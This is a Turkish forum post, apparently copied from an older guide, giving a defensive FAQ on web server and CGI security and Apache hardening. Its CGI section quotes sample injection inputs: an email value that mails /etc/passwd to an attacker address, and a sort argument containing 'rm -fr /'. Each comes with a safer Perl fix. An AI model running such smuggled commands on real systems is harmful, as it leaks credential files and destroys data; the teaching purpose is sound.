Forum Renkli - Türkiye`nin En Renkli Eğlence ve Bilgi Paylaşım Platformu  "Taklitler, Asıllarını yaşatırmış."
Go Back   Forum Renkli - Türkiye`nin En Renkli Eğlence ve Bilgi Paylaşım Platformu > Webmaster Dünyası > Webmaster Dünyası > Webmaster Genel Bilgiler
Ücretsiz Kayıt ol veya Üye Girişi yapın.
Webmaster Genel Bilgiler Webmasterlık Hakkında Genel Bilgilerin Paylaşıldığı Bölüm

Forum Renkli - Türkiye'nin En Renkli Eğlence ve Paylaşım Platformuna Hoşgeldiniz.
Forum Renkli'ye Hoşgeldiniz. Forumumuza ücretsiz KAYIT olarak, forumumuzda bilgi alışverişi yapabilir ve aramıza katılıp samimi dostluklar kurabilirsiniz.

Forumumuzda bizimle birlikte paylaşıma katılmak için buradan üye olabilirsiniz.veya Facebook üyeliğiniz ile sitemize kayıt olabilirsiniz.
Etiketli Üyeler Listesi

Yeni Konu Aç Cevap Yaz
 
LinkBack Seçenekler Stil
Alt 10 Mart 2013, 23:25   #1 (permalink)
Üye

dewiL~~ - ait Kullanıcı Resmi (Avatar)
Üyelik tarihi: 07 Mart 2013
Nerden: Sivas
Yaş: 23
(Mesajlar): 195
(Konular): 145
İlişki Durumu: Yok
Burç:
Renkli Para : 60923
Aldığı Beğeni: 19
Beğendikleri: 9
Ruh Halim: Seytan
Takım :
Standart Web Sitesi Ve CGI Uygulamalarinin Güvenligi

Çok karsilasilan bir durum: sitenizi gelistirirken, veritabanlarindan bilgi alma, onlara yazma gibi gereksinimleriniz dogdu. Bunun için de CGI uygulamalarinizi yazdiniz. Ve bir gün Web sunucusuna baglanmaya çalistiginizda makineye birilerinin girdigini, "kötü birseyler" yaptigini farkettiniz.

Bu bir senaryodan çok, sikça karsilasilan bir durumdur. Bir bilgisayarin güvenlik riskleri fisi takildigi andan itibaren basladigi halde, güvenlik hala ihmal edilmektedir. Bunun birkaç sebebini saymak gerekirse
Yetersiz bilgi
Makinenin kirilamaz oldugunu varsayma
Hiç kimsenin sizin sunucunuzla ugrasmaya tenezzül etmeyecegi düsüncesi
Programlari yazarken yeterlice sinamama
Tembellik
Güvenlik deliklerinin baslica sebepleri:
Bütün bilgisayarlarin ve programlarin insan elinden çiktigi düsünülürse, onlara zorla girebilecek baska kisilerin varolmasi da çok normaldir. Web sunuculari gibi çoklu kullanici ve dis dünyaya açik olmasi zorunlu sistemlerdeyse bu risk katlanmaktadir. Genel olarak bir Web sunucusunun güvenlik açiklarinin sebepleri sunlardan bir kismi veya hepsidir:

Karsi uç
Kullanici verileri
Web sunucusu
Web tarayicisi
CGI, ya da genel olarak sunucu tarafi çalisan programlar ve onlarin çagirdigi programlar
Karsi uç: Hatti dinleyen, sistemdeki açiklari taratan bir saldirgan da olabilir, virüs gibi sisteme istenmeden yerlesen bir program da.

Kullanici verileri: Istemciden aldiginiz veriler; bu verileri her ne sekilde islerseniz isleyin, bir kontrolden geçirmek faydali olacaktir.

Web sunucusu: Kullanilan Web sunucusunun çesitli açiklari biliniyor olabilir. Güvenlik sitelerinde arastirma yaparak, kullandiginiz sunucu sürümüne özel, ya da eski sürümlerde olup, sizdeki sürümde hala kapatilmamis açiklarin bir listesini çikarmaniz faydali olacaktir.

Web tarayicisi: 2. maddeyle birlesik düsünülebilir. Güvenliginiz, kullanicidan gelen verileri dogrulamak için istemci tarafi tekniklere (ör. JavaScript'le form dogrulama ) dayandirilmamalidir.

CGI, sunucu tarafi programlar: Web sunucunuz, CGI programlariyla saldiriya daha açik hale gelebilir, ancak bu her zaman daha güvensiz olacaktir seklinde de yorumlanmamalidir.

Sikça sorulan sorular:
Soru:
Hangi isletim sistemi daha güvenlidir?

Cevap:
Her isletim sisteminin kendine has güvenlik delikleri vardir. Ancak bunlarin bir kismi acemi saldirganlara kolay geçit vermezken, bazilari her gelene kapiyi açabilirler. Sitenizi tasarlarken eger herseyden önce güvenligi ön plana aliyorsaniz, Unix türevi bir isletim sistemi (ancak hepsi degil ) kullanmaniz yerinde olacaktir. Örnegin, FreeBSD gelistirilirken çok güvenli bir Internet sunucusu olarak tasarlanmistir. Ancak, Linux, Solaris, HP-UX gibi sistemler de bu is için çok uygundur. Windows 95/98 gibi son kullaniciyi hedef alan isletim sistemleriyse asla ciddi bir alternatif olarak görülmemelidir. Windows NT'yse paketten çiktigi haliyle pek güvenli degildir, ve güvenli hale getirilmesi için biraz ugrasilmasi gerekir.

Soru:
Web sunucusunu root olarak çalistirmanin yanlis oldugunu duydum, bu dogru mu?

Cevap:
Unix isletim sisteminde 1024'den küçük bir port'u dinlemek için, root erisim haklarina sahip olmak gerekir. Birçok sunucu, ilk açilis esnasinda root olarak çalisir, ancak daha sonra 'effective uid'sini çok kisitli haklari olan nobody gibi bir kullaniciya çevirir. Bu haliyle birçok sunucuda (ör. kaynak kodu açik olan Apache'de ) bir güvenlik deligi görünmemektedir, ve bu haliyle bu sistem iyi çalismaktadir. Ancak yine de nobody kullanicisinin sistemi kullanarak e-posta gönderme (sistemdeki /etc/passwd dosyasi gibi ) gibi haklari vardir. Ancak buradaki sorunun kaynagi kullanicinin kimligi degil, çalistirilan CGI (genel olarak sunucu tarafi çalisan her tür dil, ASP, Perl, C, PHP vb ) uygulamalaridir denebilir.

Bu soruyla asil olarak kastedilense, sunucunun çalistiktan sonra da root uid'sini kullanmasi, ve örnegin CGI'larin root haklarina sahip olarak çalismasidir ki, bu gerçekten açilabilecek en büyük deliklerden biridir.

Windows sistemlerindeyse, siradan bir kullanici bile 80. port'u dinleyebildigi için, IIS (3 ve 4 sürümlerinde ) sunucunuzu göçerterek yerine kendi istedigi bir programi çalistirabilir, ve sitenizi ziyaret edenler, Web sayfalariniz yerine saldirganin istedigi herhangi bir çiktiyi görebilirler.

Soru:
SSH nedir?

Cevap:
SSH, Secure Shell'in kisaltmasidir ve sifrelenmis telnet diyebilecegimiz bir baglanti saglar. Bir SSH programiyla karsi tarafa baglandiginizda, karsi makineyle bir anahtar degisimi yaparsiniz. Bu anahtarlarla, karsi tarafa göndereceginiz bilgiyi sifreleyebilir ancak açamazsiniz. Ayni sekilde, karsidaki makineden size gelen bilgiler de sizin gönderdiginiz anahtarla sifrelenir, ama yalniz sizin özel anahtarinizla açilabilir. Dolayisiyla, hatti dinleyerek paketleri inceleyen biri olsa bile, giden mesajlari çözemeyecegi için iletisim güvenli olacaktir.

Soru:
Chroot ortami nedir?

Cevap:
Unix sistemlerinde Chroot (Change root ) komutuyla Web sunucuyu "güvenli bir kutu" içinde çalistirabilirsiniz. Chroot ortaminda, sunucu Web sayfalarinin durdugu dizin disinda, dosya sisteminde hiçbir dizini göremez. Ancak sunucunun bu ortamda çalisabilmesi için de, isletim sisteminin mini bir kopyasi bu dizinin içinde durmalidir. Böyle bir mini isletim sistemi kurmak da gerçekten zordur. Böyle bir ortam kuruldugu zaman ise, CGI programlarinin çalistirilmasi zorlasir, çünkü derlenmis ya da yorumlanan dillerin bu mini isletim sistemine konulmasi imkansiz gibidir. Konulmasi zorunluysa, chroot ortami kullanmanin anlami ortadan kalkacaktir.

Soru:
Sunucunun üstünde zaten çok fazla veri yok. Bir saldirgan girse ne olur ki?

Cevap:
Bir saldirgan yerel aginiza girdiginde, agi dinleyen bir program çalistirarak (ör. snoop Solaris'lerde hazir olarak gelmektedir ), ag üzerinden sifrelenmemis olarak giden tüm paketleri dinleyebilir, sifrelerinizi ve hassas verilerinizi ögrenebilir. Bu tip programlara genel olarak sniffer (~koklayici ) denir ve Internet üzerinde 10'larca türevi vardir.

Ag üzerindeki sniffer'lari tespit edebilen bazi sistem yönetim programlari da vardir. Ancak bunun bir tespit yöntemi de, yogun trafigi olan ancak kabul edilebilir hizda çalisan bir agda, sniffer çalistirildigi zaman ag performansin hissedilir olarak düsmesidir.

Her ihtimale karsi yerel agda bile çalisirken, SSH gibi programlar kullanilmalidir.

Soru:
Siteme bir ziyaretçi defteri (guestbook ), sayaç vb eklemek istiyorum, güvenli midir?

Cevap:
Ziyaretçi defterlerinin çogu basit programlardir ve birçogunun hatalar içerdigi bilinmektedir. Bu tip programlarin hemen hepsi diske yazma, diskten okuma islemleri yaptigi için potansiyel tehlike arzederler. Ayrica, HTML kodlarinin ayiklanmamasi da, sayfanizda istenmeyen görüntüler yaratabilir.

Sayaçlar da benzer sekilde disk üzerinde okuma ve yazma islemleri yaptiklari için potansiyel tehlikeli sinifina girerler. Ayrica, ziyaretçi defterleri de sayaçlar da genel olarak zaten pek ise yaramayan programlardir, ve sitenin kullanim degerini arttirmazlar. Özellikle bedava sayaç veren sitelerden alinanlar da, siteye baglanti hizini düsürebilirler.

Prensip olarak bilmediginiz bir programi kullanmaya baslamadan önce, sunlari bir gözden geçirin:

Ayni programi kullanan diger kisilerin tecrübeleri
Programin kaynak kodu elinizdeyse, disk erisimi, ag erisimi yapip yapmadigi, ve socket kullanip kullanmadigi
Kritik degiskenlerin, özellikle de istemci tarafindan gelen veri ya da istek dolayisiyla ortama eklenen degiskenlerde buffer overflow (tampon tasmasi ) olup olmayacagi
Programin truva ati çalistirip çalistirmadigi
Programin yetmesi gereken haklardan fazlasini (ör. bir ziyaretçi programi root olarak kurmanizi istiyorsa süphelenmek gerekir ) isteyip istemedigi
Soru:
HTML formlarinda POST yerine GET kullanmanin daha güvenli oldugunu duydum. Bu nasil olur?

Cevap:
Aslinda burada kastedilen GET'in daha güvenli oldugu degildir. POST metoduyla gönderilen veriler, sunucunun kayit dosyalarinda görünmezken, GET metodunda kayitlara geçerler. Dolayisiyla CGI'iniza kuraldisi parametreler göndermeye çalisan saldirganlarin tüm hareketleri sizde kayitli olacaktir.

Soru:
AUP nedir?

Cevap:
Acceptable Use Policy - Kabul edilebilir kullanim politikasi. Sistemi kullanan kisilerin, ag üzerinde nasil davranmalari gerektigi, hangi tip programlari çalistirabilecekleri, hangilerini çalistirmamalari gerektigi vb bilgilerin bulundugu bir belgedir. Mutlaka kullanicilarinizdan, sisteme girmelerinden önce böyle bir belgeyi kabul ettiklerini onaylamalarini isteyiniz.

Web sunucularinda, AUP'nin yeriyse daha çok sitenize içerik hazirlayan kisilerin kabul etmesi amaçlidir. Web sitenizin durdugu makineyi kullanan kisilere güvenlik politikanizi açiklayan bir belge hazirlayiniz.

Soru:
CGI programlarimda neye dikkat etmeliyim?

Cevap:

Asla, asla ve asla, kullanicidan aldiginiz verileri bir komut satirina parametre olarak bile göndermeyin. Bu maddeyi hiç aklinizdan çikarmadiginiz zaman, en büyük açiklardan birini kapatirsiniz.
1. maddeyi uygulayamamaniz halinde, kabuk ****karakterlerini (shell ****characters, ör. &;<>|* vb ) karakterleri mutlaka kontrol ediniz. Bazi örnekler vermek gerekirse:
Kullanicinin verdigi bir adrese e-posta göndermek için su Perl kodu yazilmis olsun:
$eadres = &getadres;
open(EPOSTA, "| /var/lib/sendmail $eadres );
print EPOSTA, "To: $eadres\nFrom: ulakbim@ulakbim.gov.tr\n\n
Tesekkürler\n";
close EPOSTA;

Bu durumda bir saldirgan, su sekilde bir e-posta adresi vererek makinenizdeki sifre dosyasini ele geçirebilir:
hickimse@hicbiryer; mail saldirgan@kotu.yer < /etc/passwd
Daha iyi bir yol su olabilir:
$eadres = &getadres;
open(EPOSTA, "| /var/lib/sendmail -t );
print EPOSTA<<POSTASONU;
To: $eadres
From: ulakbim@ulakbim.gov.tr
Subject: Tesekkürler
...
POSTASONU
close EPOSTA;


Bir baska örnek vermek gerekirse, kullanicidan aldiginiz kelimeleri siralamaniz gerekiyor ve su Perl kodu kullanilmis:
system "/bin/sort < &veri_al";


Bu satir, Perl'in bir kabuk açarak, sort programini çagirmasini saglar. Ancak, veri_al fonksiyonundan gelen verilerde verilecek ****karakterler kabuk tarafindan isleme konacaktir: ör. "1 3 2>/dev/null; rm -fr /" (saldirgan dosyalari CGI'in çalistigi kullanici olarak silebilir de silemeyebilir de, ancak deneyebilecegi ilk sey olabilir ). Bunun yerine daha iyi bir yöntem sudur:
system "/bin/sort", &veri_al;


Bu yöntemde, Perl bir kabuk açmadan parametreleri dogrudan isletim sistemine gönderir ve dolayisiyla ****karakterler bir sorun olmazlar.
Yine kullanicidan aldiginiz verileri, parametre olarak göndermek zorundaysaniz, aldiginiz veriyi beklediginiz veriyle karsilastirin. Bu karsilastirma isleminde, istenmedik karakterleri atmak yerine (ki istenmeyen çok genis bir kavramdir ), tam olarak istediginiz veriyle karsilastirma yapin.
Örnegin, kullanicidan bir e-posta adresi bekliyorsaniz su kodu kullanabilirsiniz:
$eposta = &veri_al;
die "Verdiginiz adres isim@kurum.com biçiminde degil"
unless (
$eposta =~ /^[\w.+-]+\@[\w.+-]+$/;
# bu regexp sadece eposta adreslerini esler


Bu durumlari uyarmanin bir yöntemi de, Perl'de bulunan tainting (lekelemek ) mekanizmasini kullanmaktir. Bunu yapmak için CGI programinizin basina "#!/usr/bin/perl -T" gibi bir satir eklemelisiniz. -T seçenegini verdiginiz zaman Perl, tainted (programin disindan alinan, ör. ortamdan alinan, standart girdiden ya da komut satirindan alinan ) degiskenleri system( ), exec( ), (|'la kullanirsaniz ) open( ) ve eval( ) komutlarinda kullanmaniza izin vermez. Ayrica tainted degiskenlerden türettiginiz bütün degiskenler de otomatik olarak tainted olurlar. Tainted bir degiskeni untainted (lekelenmemis ) bir degisken haline ancak Perl'ün karakter esleme metodlarindan biriyle, ör. =~, çevirebilirsiniz.
Özellikle, yorumlanan dillerle yazdiginiz CGI'larda çagirdiginiz programlarin dizinlerini açik olarak veriniz, ör. ls yerine /bin/ls gibi.
CGI programlarinizi tamamen yetkisiz bir kullanici hesabinda çalistiriniz, ör. nobody. Bu sekilde CGI'inizdaki bir hata nedeniyle, saldirganlar CGI'in çalistigi hesaba erisim hakki kazansa bile, sisteme hemen zarar veremez.
Perl kullaniyorsaniz, cgi-lib.pm gibi güvenilirligini kanitlamis bir modül kullaniniz. Not: PHP, klasik anlamda CGI (harici çalistirilabilir seklinde, ör. /usr/local/bin/php gibi fiziksel bir program ) olarak su an için pek saglikli çalismasa da, Apache modülü olarak (ör. mod_php.so vb ) gayet iyi çalismakta, ve Perl'de hazir gelmeyen CGI islevlerini hazir olarak sunmaktadir.
Siteniz CGI programlari tarafindan üretiliyorsa, CGI programlarinizin gelismis hata kontrolleri yaptigindan ve bunlarin kayitlarini tuttugundan emin olun. Mümkünse bu program, kayitlarini otomatik olarak e-postayla baska bir makinedeki sistem yöneticisine göndermelidir.
Soru:
Makineyi kirilmasi imkansiz hale nasil getirebilirim?

Cevap:
Makinenizi kapali tutunuz. Kirilmasi imkansiz bir sistem yoktur.

Soru:
Özel olarak Apache için neler yapabilirim?

Cevap:


Apache, genel olarak güvenli bir sunucudur, ancak yanlis ayarlari sunucunun farketmesi ve sizi uyarmasi imkansizdir. Yine de bazi ayarlari degistirerek sistemi daha da güvenli yapabilirsiniz.

Öncelikle sembolik link'lerin takibini (Option FollowSymLinks ) kapatiniz (bir yolu "Option SymLinksIfOwnerMatch" demektir ). Bu her ne kadar sunucunun performasini düsürse de, sistemdeki bir kullanici gizlice bir dizinden /etc gibi kritik bir dizine sembolik link verebilir.
Ayrica, dizinlerin otomatik listelenmesini (Option Indexes ) iptal edebilirsiniz (Option None ). Bir saldirgan sisteminizde bulunan yedek dosyalarini, kendinize kolaylik amaciyla olusturdugunuz ama silmeyi unuttugunuz sembolik baglari, geçici olusturulan dosyalari, CVS dosyalarini, sitenizin iç yapisini göremezse, içeri girmesi de zor olur.
Sunucu hakkinda bilgi almak için kullanilan, /server-info ve /server-status programciklarini sadece IP adreslerine erisilir kilmalisiniz.
Harici bir modül olan mod_disallow_id'yle (Apache sitesinde contributed modules altinda bulabilirsiniz ) belli kullanicilara, ör. root, sys, daemon veya bin'e dosyalarin Web sunucu tarafindan hiç okunamamasini, dolayisiyla çalistirilmamasini da saglayabilirsiniz.
Son olarak da, CGI programlarinizi mutlaka merkezi bir yerde tutunuz ve bu dizine yazma hakkini kisitlayiniz. Isleri kolaylastiriyor görünen .cgi uzantili dosyalari nerede görürsen gör çalistir seçenegini aktif (yani: AddHandler cgi-script .cgi ) hale getirmeyiniz.
Apache'yi suExec özelligini kullanacak sekilde derleyebilirsiniz. suExec, CGI programlarini Web sunucunun çalistigi hesaptan baska bir hesapta da çalistirabilir, ör. Web sunucunuzu nobody, CGI programlarini cgiuser gibi bir hesapta çalistirabilirsiniz.
Apache'yle birlikte gelen CGI script'lerinin (ör. printenv ) ismini degistiriniz ya da çalistirma hakkini iptal ediniz.
Soru:
Firewall nedir?

Cevap:
Bir firewall programi, yerel agla dis dünyayi birbirinden soyutlayarak, iki taraf arasindaki trafigi kisitlayabilir. Örnegin, firewall'in içinden (yerel ag ) disariya FTP izni verebilir, ama disaridan (dünya ) içeriye FTP yapilmasini engelleyebilirsiniz. Bir firewall kurmak, güvenligi saglamanin en temel adimlarindan biridir. Firewall'unuzu kurduktan sonra, sistem yöneticisi, kullanilmasi zorunlu port'lar (örnegin, Web için 80, FTP için 21, SSH için 22 vb ) disinda her port'u dis dünyaya kapatmalidir.

Soru:
Peki, Web sitemi firewall'un içine mi disina mi koymaliyim?

Cevap:
Aslinda tersi durum da tercih edilebilmesine ragmen, iyi bir çözüm disina koymaktir. Bu durumda, sunucu firewall'un korudugu disaridan her türlü saldiriya açik olacaktir, ancak sunucuya zorla girilmesi halinde, saldirganlar firewall'un içine girmemis olacaklardir (sunucunun firewall içinde kalmasi durumunda, saldirganlar firewall'u astiklari için yerel ag üzerinde - büyük ihtimalle - rahatça dolasacaklardir ). Böyle bir kurulum tercih edildigi takdirde (sunucu bir nevi 'kurbanlik koyun' gibi olacaktir ) unutulmamasi gereken birkaç husus da sunlardir:

Sunucunun root/admin sifresini baska hiçbir makinede kullandiginiz root sifresiyle ayni yapmayiniz. Sunucunuza zorla giren kisiler, ayni sifreyi diger makinelerde de deneyeceklerdir.
Benzer sekilde, sunucuda baska kullanici hesaplari açacaksaniz, iç sitenizde kullanilmayan sifreler belirleyerek, bunlarin degistirilmemesini, hatta mümkünse erisimin bir paketleyici (wrapper, ör. Web tabanli bir erisim programi ) tarafindan yapilarak, bu sifrenin iç kullanicilar tarafindan bile ögrenilmemesini saglayin.
Veritabani kopyalama (replication ), dizin senkronizasyonu gibi islemleri sunucudan firewall içine bir trafikle degil, firewall içinden sunucuya dogru bir trafikle yapiniz.
Mümkünse firewall içinden sunucuya paylastirdiginiz dizinlere sadece okuma izni veriniz.
Soru:
Ayni makinede hem Web hem de FTP servislerini çalistiriyoruz. FTP ve Web servislerinin kök dizinlerini ayni yapmak bir güvenlik açigi getirir mi?

Cevap:
Bu sik yapilan bir uygulamadir, ve uzaktan yüklenen dosyalar dogrudan çalistirilmadigi sürece herhangi bir sorun olmaz. Ancak, bir saldirgan uzaktan yükledigi bir CGI programini çalistirabilirse, sisteminize zarar verebilir. Böyle bir makinede, uzaktan yüklenen dosyalari okunur yapmamalisiniz. Birçok FTP sitesindeki "incoming" dizini yazmaya açik, listeleme ve okumaya kapalidir. Siz de bu yolu tercih etmelisiniz.

Soru:
Sunucuya birisinin girdigini farkettik, ne yapmaliyiz?

Cevap:
Öncelikle panige kapilmayin ve sakin makineyi bir anda kapatmayin. Önce saldirganin o anda ne yapmakta oldugunu tespit etmeye çalisin ve sanki haberiniz yokmus gibi davranin. Bu arada root hesabinda çalisiyorsaniz, tanimadiginiz komutlari yanlislikla da olsa çalistirmamak için, sisteme normal bir kullanici olarak girin. Bu programlar root haklarinda çalisirsa, kendi elinizle sisteme zarar vermis olursunuz. Makinedeki önemli kayit dosyalarinin (syslog, sulog vb ) ve listelerin (last|more>last.out, ps-ef>ps.out vb ) hemen bir kopyasini e-posta, scp gibi bir yöntemle baska bir makineye atin.

Makinenizi tek kullanici modunda (single user mode, genellikle "init s" gibi bir komutla ) açin. Öncelikle sisteme en son eklenen, ya da degistirilen dosyalarin listesini çikartin ve setuid biti açik programlara ya da yukarida aldiginiz kayitlardan bu programlarin aldigi dosya parametrelerine bakiniz. Kullanicinin sisteme girdigi IP adresini kayitlardan bulmaya çalisarak, makinenin kaynagi olan yeri bulmaniz da ise yarayabilir. Bu sekilde, karsi tarafin sistem yöneticisine bir e-posta atarak durumu bildirebilirsiniz. Ayrica kayitlari inceleyerek olagan olmayan durumlari arastiriniz. Birçok saldirgan, bir programa belli parametreler göndererek, onu önce sismeye zorlarlar (genellikle buffer overflow seklinde olur ) sonra da makineye root erisimi kazanirlar. Bu sekilde bir program bulursaniz, o servisi önce iptal ediniz, daha sonra baska bir makineden Internet'e baglanarak saldirganin kullandigi metodlari tespit etmeye çalisiniz. Saldirganin kullandigi metodu bulursaniz, bu açiklari kapatmaniz da daha kolay olacaktir. Sisteminizde bir hasar tespit edebilirseniz, yedeklerinizden sistemi eski haline getiriniz. Daha sonra sunucuyu dis dünyaya tekrar açmadan önce, yedeklediginiz dosyalardaki (ör. CGI programlari, yanlis ayarlar ) hatalari da düzeltmeyi unutmayiniz.

Not: Yukarida bahsedilen yöntem, sistem yöneticisinden yöneticiye degisebilir. Bu sadece örnek bir uygulamadir ve fikir vermek amaciyla yazilmistir.

Soru:
Baska neler yapabilirim?

Cevap:
Asagidaki maddelerin uygulanmasi, güvenlik deliklerini kapatmamakla beraber, bir felaket durumunda sistemin kurtarilmasini, sorumlunun bulunmasini, ya da olasi güvenlik problemleri olan servislerin iptal edilmesini saglarlar.

Öncelikle, sistemin dönüsümlü yedegini aliniz. Bir göçme durumunda yedekler çok isinize yarayacaktir. Firewall olan bir ortamda, yedekleri içerideki bir makineden, disaridaki sunucuya güvenli bir yolla (Unix NFS ve Windows File Sharing çok güvenli metodlar degildir, özellesmis metodlar, örnegin tar/scp ikilisi, daha güvenli olabilir ) baglanarak aliniz. Tersini (disaridaki Web sunucusundan içerideki bir makinenin diskine yazmaya çalisarak ) asla yapmayiniz.
Web sunucunuzu mümkünse, baska servislerin çalismadigi, üzerinde kullanicilarin tanimlanmadigi bir makineye tasiyiniz.
Yerel aginizda bir SSH paketi kullaniniz. Bu programlarla yerel ag üzerinden akan tüm trafik kirilmasi yüzyillar alacak sekilde sifrelenmektedir. SSH'in avantaji, Web sunucunuza baglanmak zorunda kalan kisilerin, makineye gizlice girmis bir saldirgana sifrelerini kolayca kaptirmamalarini saglar.
Web sunucunuzda, grafik arabirim (Unix'deki Window Manager kavrami ) vb gereksiz özellikleri kapatiniz (Windows'da bu mümkün degildir ). Ayrica makine üzerindeki tüm gereksiz servisleri kapatiniz. Örnegin, Unix'de RPC, NFS server, finger, rlogin gibi servislerin güvenlik delikleri bilinmektedir. Hatta, sendmail, inetd gibi programlari daha güvenli "olan" qmail, xinetd gibi programlarla degistiriniz. Not: Windows 2000'de bu is imkansiz gibidir.
Makinenize gelen tüm servis isteklerinin bir kaydini aliniz. Örnegin tcp wrapper programi (xinetd içinde bu destek de vardir ) bu isi çok iyi yapmaktadirlar.
Web sunucunuzun kayitlarini düzenli olarak inceleyiniz, ve hatta bir kayit analiz programi kullanabilirsiniz. Mümkünse bu kayitlari da düzenli olarak yedekleyiniz.
Makinenize DoS (Denial of Service ) saldirilarini engelleyiniz. DoS, bir saldirinin adi degil, bir saldiri biçimidir, ve birden çok yöntemi vardir. Örnegin ping paketleriyle bombardiman yaparak makinenin dis dünyaya cevap veremez hale getirilmesi ya da Web sunucusundan 10000 karakterden olusan bir adres istenerek sunucunun kilitlenmesi, DoS saldirilaridir. Yapilan saldirinin türüne göre farkli önlemler vardir.
Güvenli bir Web sunucusu için SSH ve HTTP servisleri yetmektedir. Geri kalan tüm servisler ekstra ihtiyaçlariniz için açilmaktadir, ancak bir sitenin vermesi gereken minimum servisi etkilemezler.
Sifrelerinizi düzenli olarak degistiriniz. Bu yolla, sifreniz bir kere ögrenilmis bile olsa, ögrenen kisi bu sifreyi sisteminize girmek için tekrar kullanamaz. Ayrica, kritik makinelerinizin sifrelerini asla ayni yapmayiniz, herbiri için ayri sifreler kullaniniz.
Ag monitörleme ve sniffer programlarini tespit eden programlari kullaniniz.
Genel olarak saldirganlar, bir makineye girdikten sonra, tekrar girebilmeleri için kendilerinin bildigi açik kapilar birakirlar. Sistemde çalistiracaginiz bir programla, sistemdeki kritik yerlerdeki (örnegin /sbin, /etc, /usr/local vb ) dosyalarin tarihlerinin degisip degismedigini, eklenen/silinen programlarin ve dosyalarin listesini, ya da dosyalarin içindeki degisiklikleri kontrol etmelisiniz. Bu tip programlara genel olarak intrusion detection programlari adi verilir
Server Side Include (Sunucu tarafi ekleme ) kullaniyorsaniz, Exec komutunu kapatiniz. Apache için bunu istediginiz yerler için Option IncludesNoExec yönergesiyle yapabilirsiniz.
CGI programlariniza bir paketleyici yazarak, CGI'larinizi önce ona havale eder ve alt CGI'lari onun üstünden çagirabilirsiniz. Bunun iki avantaji vardir:
Alt programlara gerekli bilgileri devretmeden önce bir güvenlik kontrolü yapabilirsiniz.
Alt programlarda, kendisini çagirmasi gereken program olarak paketleyici programi gösterirseniz, saldirganlarinizin sitenize (bir sekilde ) yükledigi bir programi rastgele bir biçimde çalistirmasini engelleyebilirsiniz.
Bu metodun bir benzerini kullanan çesitli CGI wrapper'lar mevcuttur, ör. yukarida da bahsedilen Apache suExec, ya da cgiwrap, sbox paketleyicileri.
Alıntıdır.


HAYATI OLDUGU GİBİ KARŞILAMAZSAN, İLİKLEMEZ ÖNÜNÜ ASLA KARŞINDA
dewiL~~ isimli Üye şimdilik offline konumundadır   Alıntı
Yeni Konu Aç Cevap Yaz

Etiketler
cgi, güvenligi, sitesi, uygulamalarinin, ve, web


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Forum Renkli Sosyal Medya
Forumrenkli Facebook Forumrenkli Twitter Forumrenkli RSS
Forum Renkli Desteklediklerimiz

Forum Renkli Yasal Uyarı!

Forum Renkli Türkiye'nin en renkli eğlence ve bilgi paylaşım platformudur. Hukuka, yasalara, telif ve kişilik haklarına bağlıdır. "5651 sayılı yasada" belirtilen "Yer Sağlayıcı" olarak hizmet sunmaktadır. İlgili yasaya göre site yönetiminin tüm içerikleri kontrol etme yükümlülüğü yoktur. Bu sebep ile sitemiz, uyarıları dikkate alarak yasa dışı paylaşımlar hakkında gerekli işlemleri yapmaktadır. Oluşabilecek yasal sorumluluklar "Üyelerimize" aittir.

Forum Renkli; Arkadaşlık, Dostluk, Eğlence, Paylaşım, Msn Nickleri, Msn Sözleri, Msn Avatarları, Ödüllü Yarışmalar, Msn Sözleri, Şiirler, Şarkılar, Moda, Sağlık, Tv, Dizi, Film, Komik, Komik Resimler, Komik Videolar, Haberler, Spor Haberleri ve Güncel Bilgi Paylaşımı gibi konuların kullanıcıları tarafından önceden onay almadan anında yayınlayabildikleri bir forumdur.

Copyright© 2011 - 2013, ForumRenkli.com® Tüm Hakları Saklıdır.


Forum Renkli Alexa Forum Renkli SitemapvBulletin® Version 3.8.7 ile güçlendirilmiştir.
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd
Inactive Reminders By Realdizayn

Search Engine Optimization by vBSEO 3.6.1 ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557